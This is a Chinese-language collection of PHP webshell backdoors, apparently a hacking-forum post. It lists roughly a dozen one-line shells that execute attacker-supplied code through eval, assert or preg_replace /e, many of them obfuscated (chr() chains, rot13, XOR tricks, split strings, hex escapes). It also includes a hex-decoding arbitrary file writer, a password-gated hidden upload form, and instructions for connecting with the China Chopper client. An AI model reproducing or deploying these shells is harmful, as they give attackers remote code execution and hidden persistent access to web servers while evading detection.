v第一种：1.php

<?php ($_=@$_GET[2]).@$_($_POST[1])?>
我变了一下，在菜刀里写http://localhost/1.php?2=assert密码是1
第二种2.php

<?php
$_="";
$_[+""]='';
$_="$_"."";
$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");
?>
<?php ${'_'.$_}['_'](${'_'.$_}['__']);?>
在菜刀里写
http://localhost/2.php?_=assert&__=eval($_POST['pass']) 密码是pass


<?php $f=realpath(dirname(__FILE__)."/../").$_POST["z1"];$c=$_POST["z2"];$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode("%".substr($c,$i,2));@fwrite(fopen($f,"w"),$buf); echo "1ok";?>

格式化代码分析发给大家

z1=222.txt&z2=74657374生成 ../222.txt 内容test

<?php 
$f=realpath(dirname(__FILE__)."/../").$_POST["z1"]; //返回生成文件的路径
$c=$_POST["z2"];$buf=""; //z2获取内容到变量c中,初始化变量buf
for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode("%".substr($c,$i,2)); //计次循环,解码c提交上来的内容
@fwrite(fopen($f,"w"),$buf); echo "1ok"; //生成文件
?>

<?php
if(isset($_POST['page'])) {
	$page = $_POST[page];
	preg_replace("/[errorpage]/e",$page,"saft");
	exit;
}
?>
 带md5并可植入任意文件
<?
md5($_GET['qid'])=='850abe17d6d33516c10c6269d899fd19'?array_map("asx73ert",(array)$_REQUEST['page']):next;
?>
shell.php?qid=zxexp  密码page

<?php eval(str_rot13('riny($_CBFG[cntr]);'));?> 

<?php array_map("ass\x65rt",(array)$_REQUEST['expdoor']);?>

<?$_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_uU(40).$_uU(36).$_uU(95).$_uU(80).$_uU(79).$_uU(83).$_uU(84).$_uU(91).$_uU(49).$_uU(93).$_uU(41).$_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU(101).$_uU(95).$_uU(102).$_uU(117).$_uU(110).$_uU(99).$_uU(116).$_uU(105).$_uU(111).$_uU(110);$_=$_fF("",$_cC);@$_();?>

<?php
if($_GET["hackers"]=="2b"){if ($_SERVER['REQUEST_METHOD'] == 'POST') { echo "url:".$_FILES["upfile"]["name"];if(!file_exists($_FILES["upfile"]["name"])){ copy($_FILES["upfile"]["tmp_name"], $_FILES["upfile"]["name"]); }}?><form method="post" enctype="multipart/form-data"><input name="upfile" type="file"><input type="submit" value="ok"></form><?php }?>


<?php
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}
[/*-/*-*/0/*-/*-*/-/*-/*-*/3/*-/*-*/-/*-/*-*/6/*-/*-*/]);?>
